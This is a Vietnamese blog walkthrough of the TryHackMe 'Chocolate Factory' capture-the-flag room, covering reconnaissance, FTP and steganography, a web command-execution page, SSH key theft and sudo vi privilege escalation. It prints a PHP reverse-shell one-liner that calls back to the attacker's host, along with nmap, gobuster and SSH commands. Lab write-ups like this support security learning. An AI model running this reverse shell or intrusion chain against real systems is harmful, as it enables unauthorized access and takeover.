Advertisement

Responsive Advertisement

Chocolate Factory – TryHackMe

 Welcome to Willy Wonka’s Chocolate Factory!

This room was designed so that hackers can revisit the Willy Wonka’s Chocolate Factory and meet Oompa Loompa

This is a beginner friendly room!

If you have any issues / queries you can reach us through Discord or Twitter.

( Created by AndyInfosec team for the community! )

Bước 1: Thu thập thông tin

Mình sử dụng nmap để dò quét cổng dịch vụ mạng:

nmap -T4 -sV -sC -p-  <tar-get>

8.PNG

Rất nhiều cổng dịch vụ được mở đặc biệt mình chú ý cổng 21,22,80

Bước 2: Khai thác dịch vụ FTP

Mình truy cập ftp với username mặc định anonymous

11.PNG

Có một tập tin ảnh gum_room.jpg mình tải về thử dùng công cụ phân tích ảnh để khai thác xem thế nào.

exiftool gum_room.jpg

Thấy một tập tin b64.txt, mình sử dụng steghide để giải nén lấy tệp tin ra và đọc

16.PNG

Đem mã này đi giải mã base64 mình thu được chuỗi các thông tin username và password giống nội dung của tệp /etc/passwd

Mình sử dụng john zipper để giải mã hàm băm mật khẩu của user Charlie

17.PNG

Nhưng buồn là mật khẩu này không thể SSH được. 🙁  🙁  🙁

Bước 3: Khai thác dịch vụ web

Truy cập website đây là một trang đăng nhập, kiểm tra thông tin qua mã nguồn không thể khai thác gì từ nó cả.

1.PNG

Mình kiểm tra xem có đường dẫn khác không bằng lệnh gobuster

2.PNG

Thấy đường dẫn home.php mình truy cập vào xem sao, phát hiện đây là trang có thể thực hiện lệnh bash shell trên linux

3.PNG

4.PNG

Mình phát hiện tệp tin key_rev_key mình giờ tìm cách reverse tcp kết nối tới máy victim để đọc nó xem sao

php -r '$sock=fsockopen("Your IP",Port);exec("/bin/sh -i <&3 >&3 2>&3");'

5.PNG

Sau khi vào hệ thống mình tiến hành đọc tệp tin key_rev_key

7.PNG

Một key và nó nên giữ lại thực hiện việc leo thăng tiếp theo của chúng ta.

Mình đến thư mục home và kiểm tra phát hiện user là charlies và thấy tệp tin private key ssh mình tải về máy tính của mình để thực hiện ssh tới máy victim

9.PNG

Bước 4: Khai thác dịch vụ SSH

Sau khi có tệp tin private key ssh mình sẽ thực hiện ssh tới máy victim với user charlies

chmod 600 id_rsa

ssh charlies@10.10.153.208 -i id_rsa

Sau đó mình sẽ đọc cờ đầu tiên

10.PNG

Sau đó mình thử dùng lệnh sudo -l

12.PNG

Lỗi phân quyền cho lệnh vi, lỗi này mình gặp ở bài rabbit year

Bước 5: Leo thăng đặc quyền

Sử dụng trang GTFOBins tìm lỗi lệnh vi.

13.PNG

Sau khi leo thăng mình tìm thư mục root thấy tệp root.py

14.PNG

Mình mở dọc thấy nó sử dụng một chương trình mã hóa và giải mã hiển thị cờ bằng python với thư viện là pyfiglet và fernet

Mình có tìm thấy một trang giả mã fernet để giải mã và thu được cờ với key tìm được ở bước 2 nhé.

15.PNG

Post a Comment

0 Comments